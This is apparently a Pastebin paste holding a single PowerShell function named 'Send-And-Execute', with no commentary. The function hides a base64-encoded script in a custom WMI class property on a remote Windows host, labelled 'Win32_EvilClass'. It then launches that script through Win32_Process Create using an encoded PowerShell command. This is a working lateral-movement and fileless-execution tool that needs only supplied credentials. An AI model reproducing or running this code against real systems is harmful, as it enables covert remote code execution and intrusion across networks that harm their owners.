Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- function Send-And-Execute {
- param(
- [string]$Username,
- [string]$Password,
- [string]$IP,
- [string]$LocalPath
- )
- # Run from 10.1.0.2 to transfer a file to 10.1.0.1.
- #$localpath = 'C:\Users\Administrator\Desktop\test.ps1'
- #$bytes = [IO.File]::ReadAllBytes($localpath)
- $bytes = Get-Content $LocalPath -Raw
- $encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($bytes))
- $opts = New-Object Management.ConnectionOptions
- $opts.Username = $Username
- $opts.Password = $Password
- $opts.EnablePrivileges = $true
- $conn = New-Object Management.ManagementScope
- $conn.Path = "\\$IP\root\default"
- $conn.Options = $opts
- $conn.Connect()
- $evilclass = New-Object Management.ManagementClass($conn, [String]::Empty, $null)
- $evilclass['__CLASS'] = 'Win32_EvilClass'
- $evilclass.Properties.Add('EvilProperty', [Management.CimType]::String, $False)
- $evilClass.Properties['EvilProperty'].Value = $encoded
- $evilclass.Put()
- $secure_pass = ConvertTo-SecureString $Password -AsPlainText -Force
- $creds = New-Object System.Management.Automation.PSCredential($Username, $secure_pass)
- #$creds = Get-Credential '10.1.0.2\Administrator'
- $args = @{
- Credential = $creds
- ComputerName = '10.1.0.2'
- }
- $payload = @'
- $encodedFile = ([WmiClass]'root\default:Win32_EvilClass').Properties['EvilProperty'].Value
- Invoke-Command -ScriptBlock {powershell -NoProfile -EncodedCommand $encodedFile}
- '@
- $encodedPayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
- $power = "powershell -NoProfile -EncodedCommand $encodedPayload"
- Invoke-WmiMethod @args -Class Win32_Process -Name Create -ArgumentList $power
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement